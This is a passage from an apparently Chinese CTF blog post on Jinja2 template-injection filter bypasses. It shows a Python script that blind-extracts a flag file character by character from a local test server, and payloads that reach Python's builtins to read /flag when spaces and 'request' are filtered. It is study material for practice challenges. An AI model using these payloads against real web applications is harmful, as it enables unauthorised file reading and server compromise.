<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> requests,string</span><br><span class="line"></span><br><span class="line">url = <span class="string">&quot;http://localhost:8080&quot;</span></span><br><span class="line"><span class="built_in">list</span> = string.ascii_letters + string.digits+ <span class="string">&quot;-/_&#123;&#125;&quot;</span></span><br><span class="line">flag = <span class="string">&quot;&quot;</span></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">999</span>):</span><br><span class="line">    <span class="keyword">for</span> j <span class="keyword">in</span> <span class="built_in">list</span>:</span><br><span class="line"></span><br><span class="line">        payload = <span class="string">&#x27;&#123;% if self.__dict__._TemplateReference__context.lipsum.__globals__.__builtins__.open(&quot;flag&quot;).read()[&#x27;</span>+<span class="built_in">str</span>(i)+<span class="string">&quot;:&quot;</span>+<span class="built_in">str</span>(i+<span class="number">1</span>)+<span class="string">&#x27;] == &quot;&#x27;</span>+j+<span class="string">&#x27;&quot; %&#125;~p0~&#123;% endif %&#125;&#x27;</span></span><br><span class="line">        <span class="comment"># print(payload)</span></span><br><span class="line">        data =&#123;<span class="string">&quot;id&quot;</span>:payload&#125;</span><br><span class="line">        res = requests.get(url,params=data).text</span><br><span class="line">        <span class="comment"># print(res)</span></span><br><span class="line">        <span class="keyword">if</span> <span class="string">&quot;~p0~&quot;</span> <span class="keyword">in</span> res:</span><br><span class="line">            i+=<span class="number">1</span></span><br><span class="line">            flag+=j</span><br><span class="line">            print(<span class="string">&quot;flag:&quot;</span> + flag)</span><br><span class="line">            <span class="keyword">break</span></span><br></pre></td></tr></table></figure>





<h2 id="2-8过滤了空格，requests"><a href="#2-8过滤了空格，requests" class="headerlink" title="2.8过滤了空格，requests"></a>2.8过滤了空格，requests</h2><p>payload基本没有变动，在这种情况下还被恶心了一下request，所以我们应该这样用：</p>
<p>原本正常的payload</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?id&#x3D;&#123;&#123; self.__dict__._TemplateReference__context.lipsum.__globals__.__builtins__.open(request.args.x1).read() &#125;&#125;&amp;x1&#x3D;flag</span><br></pre></td></tr></table></figure>

<p>改造后：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?id&#x3D;&#123;&#123; self.__dict__._TemplateReference__context.lipsum.__globals__.__builtins__.open(&quot;cat\x20&#x2F;flag&quot;).read() &#125;&#125;</span><br></pre></td></tr></table></figure>


            <!--[if lt IE 9]><script>document.createElement('audio');</script><![endif]-->
            <audio id="audio" loop="1" preload="auto" controls="controls" data-autoplay="false">
                <source type="audio/mpeg" src="">
            </audio>
            
                <ul id="audio-list" style="display:none">
                    
                        
                            <li title='0' data-url='http://link.hhtjim.com/163/425570952.mp3'></li>
                        
                    
                        
                            <li title='1' data-url='http://link.hhtjim.com/163/425570952.mp3'></li>
                        
                    
                </ul>
            
        </div>
        
    <div id='gitalk-container' class="comment link"
		data-enable='true'
        data-ae='false'
        data-ci=''
        data-cs=''
        data-r='https://github.com/ysllz/ysllz.github.io'
        data-o='https://github.com/ysllz/ysllz.github.io'
        data-a='ysllz'
        data-d='false'
    >查看评论</div>


    </div>
    
        <div class='side'>
			<ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#1-hackbar-%E8%87%AA%E5%B8%A6%E7%9A%84payload%E5%A6%82%E4%BD%95%E6%9E%84%E6%88%90%E7%9A%84"><span class="toc-number">1.</span> <span class="toc-text">1.hackbar 自带的payload如何构成的</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#1-2-config%E4%BB%A5%E5%A4%96%E7%9A%84%E6%80%9D%E8%B7%AF"><span class="toc-number">1.1.</span> <span class="toc-text">1.2 config以外的思路</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#1-3%E6%80%BB%E7%BB%93%E5%81%9A%E9%A2%98%E7%9A%84%E6%80%9D%E8%B7%AF%EF%BC%9A"><span class="toc-number">1.2.</span> <span class="toc-text">1.3总结做题的思路：</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#2-%E8%B0%88%E8%B0%88%E8%BF%87%E6%BB%A4"><span class="toc-number">2.</span> <span class="toc-text">2.谈谈过滤</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#2-1-%E8%BF%87%E6%BB%A4%E4%BA%86os%EF%BC%8Csystem%E7%AD%89%E7%9A%84%E6%83%85%E5%86%B5"><span class="toc-number">2.1.</span> <span class="toc-text">2.1 过滤了os，system等的情况</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#2-2-%E8%BF%87%E6%BB%A4%E4%BA%86%E4%B8%AD%E6%8B%AC%E5%8F%B7"><span class="toc-number">2.2.</span> <span class="toc-text">2.2 过滤了中括号</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#2-3-%E8%BF%87%E6%BB%A4%E4%BA%86-%E5%8F%B7"><span class="toc-number">2.3.</span> <span class="toc-text">2.3 过滤了.号</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#2-5%E5%88%A9%E7%94%A8request"><span class="toc-number">2.4.</span> <span class="toc-text">2.5利用request</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#2-4%E5%B0%86%E4%B8%AD%E6%8B%AC%E5%8F%B7%E5%92%8C-%E5%8F%B7%E9%83%BD%E8%BF%87%E6%BB%A4%E6%83%85%E5%86%B5%E4%B8%8B"><span class="toc-number">2.5.</span> <span class="toc-text">2.4将中括号和.号都过滤情况下</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#2-6-%E8%BF%87%E6%BB%A4%E4%BA%86%E5%8D%95%E5%BC%95%E5%8F%B7%E5%92%8C%E5%8F%8C%E5%BC%95%E5%8F%B7%E7%9A%84%E6%83%85%E5%86%B5"><span class="toc-number">2.6.</span> <span class="toc-text">2.6 过滤了单引号和双引号的情况</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#2-7-%E8%AF%BB%E5%8F%96%E6%96%87%E4%BB%B6"><span class="toc-number">2.7.</span> <span class="toc-text">2.7 读取文件</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#2-8%E8%BF%87%E6%BB%A4%E4%BA%86eval%EF%BC%8Cpopen%EF%BC%8C%E4%B8%A4%E4%B8%AA%E5%B7%A6%E8%8A%B1%E6%8B%AC%E5%8F%B7"><span class="toc-number">2.8.</span> <span class="toc-text">2.8过滤了eval，popen，两个左花括号</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E4%B8%8A%E6%B5%B7%E5%B8%82%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8%E5%A4%A7%E8%B5%9B%EF%BC%9A"><span class="toc-number">2.8.1.</span> <span class="toc-text">上海市网络安全大赛：</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#2-8%E8%BF%87%E6%BB%A4%E4%BA%86%E7%A9%BA%E6%A0%BC%EF%BC%8Crequests"><span class="toc-number">2.9.</span> <span class="toc-text">2.8过滤了空格，requests</span></a></li></ol></li></ol>	
        </div>
    
</div>


    </div>
</div>
</body>

<script src="//cdn.jsdelivr.net/npm/gitalk@1/dist/gitalk.min.js"></script>


<script src="//lib.baomitu.com/jquery/1.8.3/jquery.min.js"></script>
<script src="/js/plugin.js"></script>
<script src="/js/typed.js"></script>
<script src="/js/diaspora.js"></script>


<link rel="stylesheet" href="/photoswipe/photoswipe.css">
<link rel="stylesheet" href="/photoswipe/default-skin/default-skin.css">


<script src="/photoswipe/photoswipe.min.js"></script>
<script src="/photoswipe/photoswipe-ui-default.min.js"></script>


<!-- Root element of PhotoSwipe. Must have class pswp. -->
<div class="pswp" tabindex="-1" role="dialog" aria-hidden="true">
    <!-- Background of PhotoSwipe. 
         It's a separate element as animating opacity is faster than rgba(). -->
    <div class="pswp__bg"></div>
    <!-- Slides wrapper with overflow:hidden. -->
    <div class="pswp__scroll-wrap">
        <!-- Container that holds slides. 
            PhotoSwipe keeps only 3 of them in the DOM to save memory.
            Don't modify these 3 pswp__item elements, data is added later on. -->
        <div class="pswp__container">
            <div class="pswp__item"></div>
            <div class="pswp__item"></div>
            <div class="pswp__item"></div>
        </div>
        <!-- Default (PhotoSwipeUI_Default) interface on top of sliding area. Can be changed. -->
        <div class="pswp__ui pswp__ui--hidden">
            <div class="pswp__top-bar">
                <!--  Controls are self-explanatory. Order can be changed. -->
                <div class="pswp__counter"></div>
                <button class="pswp__button pswp__button--close" title="Close (Esc)"></button>
                <button class="pswp__button pswp__button--share" title="Share"></button>
                <button class="pswp__button pswp__button--fs" title="Toggle fullscreen"></button>
                <button class="pswp__button pswp__button--zoom" title="Zoom in/out"></button>
                <!-- Preloader demo http://codepen.io/dimsemenov/pen/yyBWoR -->
                <!-- element will get class pswp__preloader--active when preloader is running -->
                <div class="pswp__preloader">
                    <div class="pswp__preloader__icn">
                      <div class="pswp__preloader__cut">
                        <div class="pswp__preloader__donut"></div>
                      </div>
                    </div>
                </div>
            </div>
            <div class="pswp__share-modal pswp__share-modal--hidden pswp__single-tap">
                <div class="pswp__share-tooltip"></div> 
            </div>
            <button class="pswp__button pswp__button--arrow--left" title="Previous (arrow left)">
            </button>
            <button class="pswp__button pswp__button--arrow--right" title="Next (arrow right)">
            </button>
            <div class="pswp__caption">
                <div class="pswp__caption__center"></div>
            </div>
        </div>
    </div>
</div>






</html>
